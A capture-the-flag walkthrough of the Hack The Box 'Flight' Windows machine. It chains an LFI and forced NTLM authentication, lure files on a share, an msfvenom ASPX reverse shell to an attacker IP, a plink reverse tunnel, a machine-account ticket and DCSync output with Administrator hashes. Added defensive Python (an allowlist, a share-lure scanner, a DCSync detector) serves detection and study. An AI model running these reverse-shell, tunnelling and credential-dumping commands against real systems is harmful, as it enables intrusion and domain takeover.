Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site that's configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack ultimately obtaining the hashes for the Administrator user.
```
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.129.228.120 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
└─$ nmap -p$ports -sC -sV 10.129.228.120
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 21:42 CET
Nmap scan report for 10.129.228.120
Host is up (0.12s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-20 03:42:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
58229/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-20T03:43:01
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
```
Interestingly enough, we see a view parameter that includes an HTML page. If it can be abused it may lead to LFI, so let's check that.
After trying a few things we managed to include the PHP page itself.
```php
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);

if (isset($_GET['view'])) {
    $file = $_GET['view'];
    if ((strpos(urldecode($_GET['view']), '..') !== false) ||
        (strpos(urldecode(strtolower($_GET['view'])), 'filter') !== false) ||
        (strpos(urldecode($_GET['view']), '\\') !== false) ||
        (strpos(urldecode($_GET['view']), 'htaccess') !== false) ||
        (strpos(urldecode($_GET['view']), '.shtml') !== false)) {
        echo "<h1>Suspicious Activity Blocked!";
        echo "<h3>Incident will be reported</h3>\r\n";
    } else {
        echo file_get_contents($_GET['view']);
    }
} else {
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
```
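The check above is a substring blocklist, and the two inputs used later in this write-up (an absolute path to a system file and a UNC path to a share on the attacker machine) contain none of the blocked substrings. The following Python is an added example, not code from the box or from the author of this page: it ports the PHP blocklist as written and sets it beside an allowlist check that accepts only a bare `*.html` file name that resolves under the document root. The root is taken from the page's default include; the sample inputs are constructed, and the UNC host is a placeholder.

```python
import ntpath
from urllib.parse import unquote

# Document root taken from the page's default include. Assumption: the view
# parameter is only ever meant to serve *.html pages from this directory.
WEB_ROOT = ntpath.normpath("C:/xampp/htdocs/school.flight.htb")


def blocklist_allows(view: str) -> bool:
    """Straight port of the page's PHP check: True means the include runs."""
    decoded = unquote(view)                      # PHP: urldecode($_GET['view'])
    blocked = (
        ".." in decoded
        or "filter" in decoded.lower()
        or "\\" in decoded
        or "htaccess" in decoded
        or ".shtml" in decoded
    )
    return not blocked


def allowlist_allows(view: str) -> bool:
    """Hardened replacement: no substring matching at all. Accept only a bare
    *.html file name and confirm the joined path stays inside WEB_ROOT."""
    decoded = unquote(view)
    # 1. A bare file name: no directory part, no drive letter, no UNC prefix.
    if not decoded or decoded != ntpath.basename(decoded):
        return False
    # 2. Only the page type this feature exists to serve.
    if not decoded.lower().endswith(".html"):
        return False
    # 3. Belt and braces: the normalised path must remain under the root.
    full = ntpath.normpath(ntpath.join(WEB_ROOT, decoded))
    return full.startswith(WEB_ROOT + "\\")


# Constructed inputs mirroring the page. The two the blocklist lets through are
# exactly the absolute-path read and the UNC-path authentication trigger.
SAMPLES = [
    "home.html",
    "index.php",
    "C:/Windows/system32/drivers/etc/hosts",
    "//ATTACKER-IP-PLACEHOLDER/share/lol.txt",   # placeholder host, not a real one
    "../flight.htb/index.php",
    "php://filter/convert.base64-encode/resource=index.php",
]


def compare(samples=SAMPLES):
    """Return {input: (blocklist_verdict, allowlist_verdict)} for each sample."""
    return {s: (blocklist_allows(s), allowlist_allows(s)) for s in samples}


if __name__ == "__main__":
    for view, (old, new) in compare().items():
        print(f"{view!r:58} blocklist={old!s:5} allowlist={new}")
```

The three-step allowlist makes the later steps of this page impossible from this parameter: step 1 alone rejects every absolute and UNC path, and step 2 rejects the PHP source read, regardless of how the input is encoded.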
We confirm the LFI vulnerability by including some well-known Windows files such as C:/Windows/system32/drivers/etc/hosts.
```
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
```
Let's abuse that by pointing the view parameter at a remote share, which will be our attacker machine running Responder.
```
/index.php?view=///lol.txt
```
With our new user credentials the only difference we see is that we have WRITE access on the Shared share! The name indicates that this share may be used by others, so we can try to lure users into leaking their NTLMv2 hashes and grab them again with Responder.
For that we will use a tool called ntlm_theft.py to create the different files that serve this purpose.
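From the defender's side, a share that many users open is exactly where such lure files should be looked for. The following Python is an added example, not part of this write-up or of ntlm_theft: it walks a directory standing in for the share, reads the file types Explorer parses on its own when a folder is merely listed, and reports any UNC reference to a host that is not on a trusted list. The files it creates in a temporary directory are constructed for the demo; `ATTACKER-PLACEHOLDER` is a placeholder host name and `G0` is the host name from the nmap output on this page.

```python
import re
import tempfile
from pathlib import Path

# Shortcut and config types that Explorer parses when a folder is opened, so a
# remote reference inside them is resolved without the user clicking anything.
WATCHED = {".scf", ".url", ".lnk", ".ini", ".library-ms", ".xml", ".rtf", ".htm", ".html"}

# A UNC reference (\\host\...) or a file:// URL; group 1 is the host.
UNC_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9._-]+)[\\/]")


def scan_bytes(data: bytes) -> set:
    """Hosts referenced by UNC path in a file. .lnk files store strings as
    UTF-16LE, so both a byte-for-byte and a UTF-16LE view are searched."""
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(m.group(1) for m in UNC_RE.finditer(text))
    return hosts


def scan_share(root, trusted_hosts) -> list:
    """Return sorted (relative_path, [untrusted hosts]) for every watched file
    that points at a host outside trusted_hosts (compared case-insensitively)."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WATCHED:
            continue
        bad = {h for h in scan_bytes(path.read_bytes()) if h.lower() not in trusted_hosts}
        if bad:
            findings.append((str(path.relative_to(root)), sorted(bad)))
    return sorted(findings)


def build_demo_share() -> str:
    """Construct a throwaway directory standing in for the Shared share."""
    root = tempfile.mkdtemp(prefix="shared_")
    samples = {
        # benign: a shortcut to the file server named on this page
        "memo.url": "[InternetShortcut]\r\nURL=file://G0/Shared/memo.txt\r\n",
        # suspicious: folder icon fetched from a host nobody in the domain trusts
        "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\ATTACKER-PLACEHOLDER\\s\\i.ico,0\r\n",
        # plain text is not auto-parsed by Explorer, so it is not a watched type
        "notes.txt": "see \\\\ATTACKER-PLACEHOLDER\\s for details\r\n",
    }
    for name, content in samples.items():
        (Path(root) / name).write_text(content)
    return root


def demo() -> list:
    return scan_share(build_demo_share(), trusted_hosts={"g0", "g0.flight.htb"})


if __name__ == "__main__":
    for rel, hosts in demo():
        print(f"{rel}: references untrusted host(s) {', '.join(hosts)}")
```

Run periodically against a writable share (or from a file-system watcher on write events) this turns the write permission the page relies on into an alert within minutes of the file landing; the trusted-host set should list the domain's real file servers, and anything else referenced from a shortcut in a shared folder is worth a look.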
We put this web shell in the flight or school folder and reach it from the webpage.
We take a PowerShell payload from revshells.com and launch our nc listener. We are also going to use rlwrap to get a slightly more interactive shell.
Tip
rlwrap is a readline wrapper. When you put it in front of something like nc, it adds the interactive shell features that reverse shells normally lack, such as command history (↑ ↓), proper backspace and cursor movement (← →).
We could look around and enumerate the host a bit. What catches our eye is the inetpub directory, and while looking at the open ports we can see port 8000 listening.
```
TCP    0.0.0.0:8000    0.0.0.0:0    LISTENING    4
```
Trying to hit it with curl returns an error about the hostname header.
The development directory probably holds the pages of this website, so we also check who has the rights to put files in it.
```
PS C:\inetpub> ls
ls

    Directory: C:\inetpub

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          9/22/2022  12:24 PM                custerr
d-----          1/23/2026   5:32 PM                development
d-----          9/22/2022   1:08 PM                history
d-----          9/22/2022  12:32 PM                logs
d-----          9/22/2022  12:24 PM                temp
d-----          9/22/2022  12:28 PM                wwwroot

PS C:\inetpub> icacls development
development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
```
So we need to switch to our known user C.Bum. Normally we would use runas.exe for that, but it prompts for the password, which needs a GUI.
Luckily for us there is a version of the same tool for this purpose that lets you pass the command and the password right away.
We get RunasCs and upload it to our victim host either with SMB or HTTP.
The privileges are limited and the groups don't give us much. We see the WebDevs domain group, which doesn't grant any further privileges, as we checked in BloodHound.
But it makes sense that we can edit the internal IIS web files. So let’s shift to that direction in exploiting the web app.
As we established, curl doesn't work and we need to expose that internal service. Our goal is to run a web shell, or even better a reverse shell, as the account that runs that service, which hopefully has elevated permissions. That is possible since our user can now write files into the C:\inetpub dir.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
We will need to transfer the file to the victim and have also our version on the attacker host.
Unfortunately, due to server problems we couldn't upload Chisel as it's quite big, so we needed another tunneling alternative.
For that we will use plink.
Info
Plink is a command-line interface (CLI) for the PuTTY SSH client, designed for automated, non-interactive network connections on Windows, such as SSH, Telnet, and Rlogin. It is frequently used for scripting, file transfers, and establishing secure SSH tunnels or reverse connections, often utilized in network administration or, sometimes, for evasion techniques by attackers.
For that we also need to enable the SSH service on our attacker machine. We also pipe a y into plink to answer the host-key prompt of the SSH connection non-interactively!
```
PS C:\xampp\htdocs\flight.htb> cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw <ATTACKER-PASSWORD> -R 127.0.0.1:9833:127.0.0.1:8000 <ATTACKER-IP>
```
We make a reverse SSH connection forwarding victim port 8000 to our attacker machine on port 9833.
And we get the website!
The website doesn't have much, but in any case we focus straight away on trying to get RCE and a shell. The website seems to be ASP.NET, so we should use an ASPX reverse shell. Let's generate that with msfvenom.
```
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4445 -f aspx -o lol.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3425 bytes
Saved as: lol.aspx
```
We start our listener and hit the website http://localhost:9833/lol.aspx.
We got a shell as a privileged system user: specifically, iis apppool\defaultapppool is a Microsoft Virtual Account.
Info
Services that run as virtual accounts access network resources by using the credentials of the computer account in the format <domain_name>\<computer_name>$.
These accounts have the characteristic that when they authenticate over the network they do so as the machine account.
Let’s see that in Responder.
We cannot crack that hash as normally these passwords are really long and rotate frequently. What we can do is ask for a ticket for the machine account over the network.
Info
An alternate privilege escalation route would be the Potato family of attacks.
The "user" IIS APPPOOL\DefaultAppPool is a service/virtual account. This means that it has the SeImpersonatePrivilege enabled. This privilege is associated with a family of exploits known as "potatoes". You can read more about them here.
We get the ticket in Base64 kirbi format. We decode it with `cat ticket.kirbi.b64 | base64 -d > ticket.kirbi`, then convert it to ccache format and finally export it (KRB5CCNAME) so our Kerberos-aware commands pick it up.
Finally we perform a DCSync attack, telling the DC to return only the Administrator hash. We also use faketime to match the DC's clock: recall the clock skew of almost seven hours that nmap reported, while Kerberos only tolerates a few minutes of difference.
DCSync attack
```
└─$ faketime "$(ntpdate -q flight.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass -just-dc-user Administrator g0.flight.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
```
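What a domain controller records for this step is Security event 4662 carrying the replication control-access GUIDs in its Properties field. The usual detection rule (alert when the requesting account is not a domain controller) misses this page's case, because the request is made with the DC's own machine account. The Python below is an added example, not part of this write-up, that joins 4662 with the 4624 logon that created the session and alerts when a DC account replicates from an address that is not a DC. The events are constructed dicts using the field names of the Security log XML; 10.10.14.18 is the attacker host from the msfvenom command on this page, 10.129.228.120 is the DC from the nmap scan, and `j.doe` is a made-up account.

```python
# Control-access rights a DCSync request exercises. A 4662 whose Properties
# field carries any of these GUIDs is a directory-replication request.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# The domain's DCs: machine accounts and the addresses they replicate from.
DC_ACCOUNTS = {"G0$"}                                   # host G0 from the nmap output
DC_ADDRESSES = {"10.129.228.120", "127.0.0.1", "::1"}  # G0's address plus loopback


def detect_dcsync(events):
    """Return one alert dict per replication request not made DC-to-DC."""
    # 1. Logon session id -> source address, from every successful logon (4624).
    session_source = {
        e["TargetLogonId"]: e.get("IpAddress", "-")
        for e in events if e["EventID"] == 4624
    }
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
        if not rights:
            continue                                    # ordinary object access
        user = e["SubjectUserName"]
        source = session_source.get(e["SubjectLogonId"], "unknown")
        if user in DC_ACCOUNTS and source in DC_ADDRESSES:
            continue                                    # normal DC-to-DC replication
        if user not in DC_ACCOUNTS:
            reason = "replication rights used by a non-DC account"
        else:
            reason = f"DC account replicating from non-DC address {source}"
        alerts.append({"user": user, "source": source, "rights": rights, "reason": reason})
    return alerts


# Constructed sample events (field names as in the Security log XML).
SAMPLE_EVENTS = [
    # normal: the DC's own account, logged on locally, pulling changes
    {"EventID": 4624, "TargetUserName": "G0$", "TargetLogonId": "0x3e4", "IpAddress": "::1"},
    {"EventID": 4662, "SubjectUserName": "G0$", "SubjectLogonId": "0x3e4",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # this page: the machine account's ticket used from the attacker host
    {"EventID": 4624, "TargetUserName": "G0$", "TargetLogonId": "0x5a8c21",
     "IpAddress": "10.10.14.18"},
    {"EventID": 4662, "SubjectUserName": "G0$", "SubjectLogonId": "0x5a8c21",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a made-up user account asking for changes, with no matching 4624 seen
    {"EventID": 4662, "SubjectUserName": "j.doe", "SubjectLogonId": "0x7b1",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # noise: a 4662 for an unrelated property GUID
    {"EventID": 4662, "SubjectUserName": "j.doe", "SubjectLogonId": "0x7b1",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def demo():
    return detect_dcsync(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Auditing of "Directory Service Access" must be enabled for 4662 to be written at all, and the join only works when 4624 from the same DC is collected alongside it; with both in place, the faketime trick on this page changes nothing for the detection, since the alert keys on the source address of the session rather than on timestamps.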
To get the root flag we connect via evil-winrm using pass-the-hash (PTH) with the Administrator NT hash.